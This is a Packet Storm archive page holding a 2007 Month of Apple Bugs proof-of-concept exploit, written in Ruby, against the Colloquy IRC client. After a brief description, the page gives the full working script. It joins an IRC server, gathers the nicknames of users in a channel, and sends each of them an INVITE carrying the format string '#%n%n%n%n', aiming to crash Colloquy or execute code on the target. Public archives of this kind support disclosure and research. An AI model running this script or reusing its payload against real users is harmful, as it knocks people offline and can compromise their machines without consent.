what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MOAB-16-01-2007.rb.txt

MOAB-16-01-2007.rb.txt
Posted Jan 20, 2007
Authored by Kevin Finisterre, LMH | Site projects.info-pull.com

Month of Apple Bugs - Proof of concept exploit for Colloquy. Colloquy is vulnerable to a format string vulnerability in the handling of INVITE requests, that can be abused by remote users and requires no interaction at all, leading to a denial of service and potential arbitrary code execution.

tags | exploit, remote, denial of service, arbitrary, code execution, proof of concept
systems | apple
SHA-256 | ecc8ca506c0501b6a06a3dce70b0267fdd8463686c38cd7f7364ee7acf7ad640

MOAB-16-01-2007.rb.txt

Change Mirror Download
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh@info-pull.com>
#
# Makes use of the Colloquy INVITE format string vulnerability.
#

require 'socket'

target_channel = (ARGV[0] || "#whatever")
target_server = (ARGV[1] || "irc.server.org")
target_port = (ARGV[2] || 6667)

rand_nick = "spongebo"
channel_joined = false
ready_to_go = false
abuse_attempts = 2
chan_fmtstring = ("#%n%n%n%n") # develop payload when feeling like it.
target_furries = []

irc_socket = TCPSocket.new(target_server, target_port.to_i)

irc_socket.print "USER #{rand_nick} localhost localhost r\n"
irc_socket.print "NICK #{rand_nick}\r\n"
while true
s = irc_socket.gets
case s.strip
when /^PING :(.+)$/i
puts "++ PING..."
irc_socket.send "PONG :#{$1}\n", 0
puts "++ PONG."
when /^:(.+?)!(.+?)@(.+?)\sPRIVMSG\s.+\s:[\001]PING (.+)[\001]$/i
puts "++ CTCP PING from #{$1}!#{$2}@#{$3}"
irc_socket.send "NOTICE #{$1} :\001PING #{$4}\001\n", 0
when /^:(.+?)!(.+?)@(.+?)\sPRIVMSG\s.+\s:[\001]VERSION[\001]$/i
puts "++ CTCP VERSION from #{$1}!#{$2}@#{$3}"
irc_socket.send "NOTICE #{$1} :\001VERSION Unabomber v0.011\001\n", 0
when /n=(.+) (.+) (.+) (.+) (.+) (.*)$/i
nickarr = s.scan(/n=(.+) (.+) (.+) (.+) (.+) (.*)/).flatten

if nickarr.size > 3
if nickarr[2].size > 2 and nickarr[2] != target_server
nickarr = nickarr[2]
elsif nickarr[1].size > 2 and nickarr[1] != target_server
nickarr = nickarr[1]
elsif nickarr[3].size > 2 and nickarr[3] != target_server
nickarr = nickarr[3]
end

target_furries << nickarr
end
else
unless channel_joined
#irc_socket.send "JOIN #{target_channel}\n", 0 (uncomment to join channel)
irc_socket.send "JOIN #{chan_fmtstring}\n", 0
channel_joined = true
end

if channel_joined and abuse_attempts != 0
irc_socket.send "WHO #{target_channel}\n", 0
abuse_attempts -= 1
end

# we need to throttle the pwnage or server will kick our ass
if target_furries.size > 1
target_furries.each do |zealot|
puts "++ Pwning #{zealot}"
irc_socket.send "INVITE #{zealot} #{chan_fmtstring}\n", 0
sleep 1
end
end
end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close